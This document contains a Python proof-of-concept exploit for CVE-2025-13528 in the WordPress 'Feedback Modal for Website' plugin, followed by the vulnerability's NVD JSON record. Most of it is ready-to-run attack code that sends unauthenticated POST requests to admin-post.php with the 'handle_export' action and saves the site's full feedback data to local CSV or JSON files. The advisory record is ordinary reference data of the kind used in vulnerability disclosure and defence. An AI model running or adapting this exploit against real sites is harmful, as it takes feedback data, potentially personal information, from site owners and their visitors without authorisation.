CVE-2025-13528

# CVE-2025-13528 PoC - Unauthenticated Feedback Data Export # Affected: Feedback Modal for Website plugin <= 1.0.1 import requests import sys TARGET_URL = "https://example.com" # Replace with target URL def exploit_export_csv(): """Export all feedback data in CSV format without authentication""" endpoint = f"{TARGET_URL}/wp-admin/admin-post.php" # Prepare the export request - no authentication required data = { 'action': 'handle_export', 'export_data': '1', 'file_type': 'csv' } print("[*] Sending exploit request for CSV export...") print(f"[*] Target: {endpoint}") try: response = requests.post(endpoint, data=data, timeout=30) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: # Check if we received CSV data if 'text/csv' in response.headers.get('Content-Type', '') or ',,' in response.text: print("[+] SUCCESS: Feedback data exported!") print(f"[+] Response preview: {response.text[:500]}") # Save to file with open('exported_feedback.csv', 'w') as f: f.write(response.text) print("[+] Data saved to exported_feedback.csv") return True print("[-] Export attempt completed, check response manually") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def exploit_export_json(): """Export all feedback data in JSON format without authentication""" endpoint = f"{TARGET_URL}/wp-admin/admin-post.php" data = { 'action': 'handle_export', 'export_data': '1', 'file_type': 'json' } print("[*] Sending exploit request for JSON export...") try: response = requests.post(endpoint, data=data, timeout=30) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[+] SUCCESS: JSON feedback data exported!") with open('exported_feedback.json', 'w') as f: f.write(response.text) print("[+] Data saved to exported_feedback.json") return True return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-13528 Exploit - Feedback Modal for Website") print("=" * 60) exploit_export_csv() print("\n" + "=" * 60)

{"cve": {"id": "CVE-2025-13528", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:07.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Feedback Modal for Website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'handle_export' function in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to export all feedback data in CSV or JSON format via the 'export_data' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/feedback-modal-for-website/tags/1.0.1/inc/admin/main.php#L1011", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/feedback-modal-for-website/trunk/inc/admin/main.php#L1011", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3341c29-a69e-4618-a8a5-11f4141ff88f?source=cve", "source": "[email protected]"}]}}